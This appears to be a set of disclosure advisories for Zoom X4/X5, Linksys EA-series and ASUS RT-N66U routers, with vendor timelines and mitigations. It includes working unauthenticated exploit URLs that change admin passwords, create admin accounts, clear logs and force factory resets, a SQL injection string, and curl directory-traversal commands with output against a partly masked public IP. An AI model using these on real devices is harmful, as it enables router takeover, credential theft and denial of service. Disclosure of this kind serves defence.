a patch is ready Change the default username and password If the AiCloud service is used, it would be advisable to change that password if it was the same one used or the router
Zoom X4/X5 ADSL Modem and Router -Unauthenticated Remote Root Command Execution
Vulnerable Products - Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Note: A similar vulnerability was reported several years ago on the Zoom X3 ADSL Modem using a SOAP API call. Many of these vulnerabilities affect X3 in the same manner, without needing to use a SOAP API. === Vulnerability- When UPnP services and WAN http administrative access are enabled, authorization and credential challenges can be bypassed by directly accessing root privileged abilities via a web browser URL. All aspects of the modem/router can be changed, altered and controlled by an attacker, including gaining access to and changing the PPPoe/PPP ISP credentials. Timeline with Vendor- Have had no response from Zoom Telephonics since first reporting the problem on June 28. Subsequent emails have been sent with no response. Root Cause Observed- -As in most IGD UPnP routers and modems, where root vulnerabilities are prevalent, these modems contain the same privileged tunnel between either side of the router to be traversed without authentication. The code and layout of the device plays a large role as well. Code/Script Vulnerabilities- -Form tags and actions ids usually hidden are easily seen from the html source, no sanitization of client side input is occurring and root overrides such as 'Zadv=1' can be invoked by any user. -No cookie authentication is done once several of the first bypass is executed, allowing for Cookie: sessionId=invalid to pass admin commands. -The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of any URL page calling a table value, such as /MainPage?id=25, will bring up the system status page, with each interface visible and selectable. Patches or Fixes- At this time, there are no known patches or fixes. Vulnerability proofs and examples- All administrative items can be accessed through these two URLs --Menu Banner http://IP/hag/pages/toc.htm -Advanced Options Menu http://IP/hag/pages/toolbox.htm Example commands that can be executed remotely through a web browser URL, or a modified HTTP GET/POST requests- -Change Password for admin Account On Firmware 2.5 or lower http://IP/hag/emweb/PopOutUserModify.htm/FormOneuser=adminex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes On Firmware 3.0- http://IP/hag/emweb/PopOutUserModify.htm?id=40user=adminZadv=1ex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes -Clear Logs http://IP/Action?id=76cmdClear+Log=Clear+Log -Remote Reboot to Default Factory Settings- Warning - For all intents and purposes, this action will almost always result in a long term Denial of Service attack. http://IP/Action?reboot_loc=1id=5cmdReboot=Reboot -Create New Admin or Intermediate Account- On Firmware 2.5 or lower http://IP/hag/emweb/PopOutUserAdd.htm?id=70user_id=newintermediateaccountpriv=v2pass1=123456pass2=123456cmdSubmit=Save+Changes On Firmware 3.0- http://IP/hag/emweb/PopOutUserAdd.htm?id=70Zadv=1ex_param1=adminuser_id=newadminaccountpriv=v1pass1=123456pass2=123456cmdSubmit=Save+Changes Mitigation and Workarounds- Adv.Options -- UPnP -- -- Disable UPnP -- Write Settings to Flash -- Reboot Adv.Options -- Firewall Configuration -- Enable 'Attack Protection' 'DOS Proctection''Black List'-- Write Settings to Flash Adv.Options -- Management Control -- Disable WAN Management from all fields -- Write Settings to Flash Always change the default Username and Password, though this will nothelp mitigate this vulnerability
Linksys EA - 2700, 3500, 4200, 4500 w/ Lighttpd 1.4.28 Unauthenticated Remote Administration Access
Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500 using lighttpd 1.4.28 and Utopia on Linux 2.6.22 Firmware Version: 1.0.14 EA2700 Firmware Version: 1.0.30 EA3500 Firmware Version: 2.0.36 E4200 Firmware Version: 2.0.36 EA4500 Impact: - Major Timeline: - Still awaiting word back from Linksys support. Partial disclosure at the present due to the impact; Full disclosure in near future if warranted. Vulnerabilities: - Unauthenticated remote access to all pages of the router administration GUI, bypassing any credential prompts under certain common configurations (see below) - Direct access to several other critical files, unauthenticated as well Vulnerability Conditions seen in all variations: - Remote Management - Disabled - UPnP - Enabled - IPv4 SPI Firewall Protection - Disabled Although not the same symptoms as the bug that plagues most ASUS routers that are AiCloud enabled with WebDav, the utilization of both UPnP and SSL on lighttpd v 1.4.28 appears to be an extremely problematic combination, exposing certain vulnerabilities to the WAN side of the router. Recommendations- - Disable UPnP - Enable at minimum the built in IPv4 SPI firewall - Oddly, in some instances, resetting the password and doing a full power down reboot has shown to close the vulnerability, but not always - Disallow remote access from the WAN side - both http and https - Changing the default user name and password won't help in this case, but it always bears repeating - Since an attacker has access to enable FTP service, USB drives mounted in the router should be removed until a patch is out, or the full scope of the issue is known Testing additional firmware is ongoing.
ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln
Vulnerable product: ASUS RT-N66U when HTTPS WebService via AiCloud is enabled (AC66R and RT-N65U are effected as well, but need more testing) Vulnerabilities: - Linux 2.6.22 - Researched on both 3.0.0.4.270 and 3.0.0.4.354 firmware - Full directory traversal and plain text disclosure of all sensitive files, including /passwd and /shadow - Full access to webdav.db and smbdav.db - Ability to traverse to any external storage plugged in through the USB ports on the back of the router Not fully confirmed but seen in several tests and are probable: - Uploading of malicious java script into the Smart sync folder, which is then sent to the host when they preform their scheduled sync - Ability to often alter iptables, dns, firewall settings and many other configurations without authentication Likely but need additional testing: (needed to list this because the potential for an attacker to gain a pptp tunnel to an extremely large numbers of routers, is quite possible and extremely dangerous) - Ability to change or alter configuration files normally only changed through the GUI web admin console - Ability to enable VPN service with pptp (Needs far more testing) - Suppress logging through disabling a configuration switch Timeline: - Contacted Asus two weeks ago (under my online handle account) around 06/06 - Second email send on 06/10 when discovered first un-authenticated file disclosure - Received only one response back stating it was not an issue - Sent a third email on 06/14 - Only response received was an acknowledgement that my email was received - Attempted to call their development or incident team, and was told that someone would call me back on 06/17 - Sending another email today under my real name The vulnerability is that on many, if not on almost all N66U units that have enabled https web service access via the AiCloud feature, are vulnerable to un-authenticated directory traversal and full sensitive file disclosure. Any of the AiCloud options Cloud Disk Smart Access and Smart Sync(need another verification on this one) appear to enable this vulnerability. When AiCloud is enabled, web access is defaulted to port 443 and content streaming to http port 8082. Depending on numerous configuration factors and which firmware version that is used, the directory structure, and what files are disclosed when bypassing authentication varies. Both ports will disclose the information, port 8082 being of the most concern since, for now, the web access via mini_httpd port 80, is not as vulnerable to directory traversal. More urgent testing needs to be done here. HTTPS uses lighttpd v 1.429. The UPnP bug concerning the exposed hidden $root samba share, which allows simple wget commands to grab 4 sensitive XML's is already well known. http://seclists.org/fulldisclosure/2013/Mar/126 The $root share is part of the problem, however, UPnP does not need to be enabled for the vulnerability to be active. Using basic cURL commands, all sensitive information can be obtained given the right directory path. Credit for finding this bug, or at least I think it was them, are the folks at http://www.websecuritywatch.com/ I'm sure he will confirm the difficulty in dealing with ASUS. ex: (-v is helpful to see that SSL allows bypass of authentication, even when it recognized a bogus cert is being used) -e is optional, but on a few settings, putting it to 192.168.1.1 allows for bypass --cacert any fake .pem file to 192.168.1.1 will work, and often this marker is optional cURL -v https://IP/smb/tmp/lighttpd.conf -k -L --cacert fake.pem -e http://192.168.1.1 Once I found this conf file, along with parsing the DOM bindings using firebug on the HTTPS AiCloud login page, I was able to piece together the directory structure. It is important enough to post here. root@Qanan:~# curl https://208.xxx.xx.xxx/smb/tmp/lighttpd.conf -k -L --cacert ASUS.pem * About to connect() to 208.xxx.xx.xxx port 443 (#0) * Trying 208.xxx.xx.xxx... * connected * Connected to 208.xxx.xx.xxx (208.xxx.xx.xxx) port 443 (#0) * successfully set certificate verify locations: * CAfile: ASUS.pem CApath: /etc/ssl/certs * SSLv3, TLS handshake, Client hello (1): * SSLv3, TLS handshake, Server hello (2): * SSLv3, TLS handshake, CERT (11): * SSLv3, TLS handshake, Server key exchange (12): * SSLv3, TLS handshake, Server finished (14): * SSLv3, TLS handshake, Client key exchange (16): * SSLv3, TLS change cipher, Client hello (1): * SSLv3, TLS handshake, Finished (20): * SSLv3, TLS change cipher, Client hello (1): * SSLv3, TLS handshake, Finished (20): * SSL connection using ECDHE-RSA-AES256-SHA * Server certificate: * subject: C=US; CN=192.168.1.1 * start date: 2009-12-31 04:48:00 GMT * expire date: 2020-01-01 16:48:00 GMT * common name: 192.168.1.1 (does not match '208.xxx.xx.xxx') * issuer: C=US; CN=192.168.1.1 * SSL certificate verify result: self signed certificate (18), continuing anyway. GET /smb/tmp/lighttpd.conf HTTP/1.1 User-Agent: curl/7.26.0
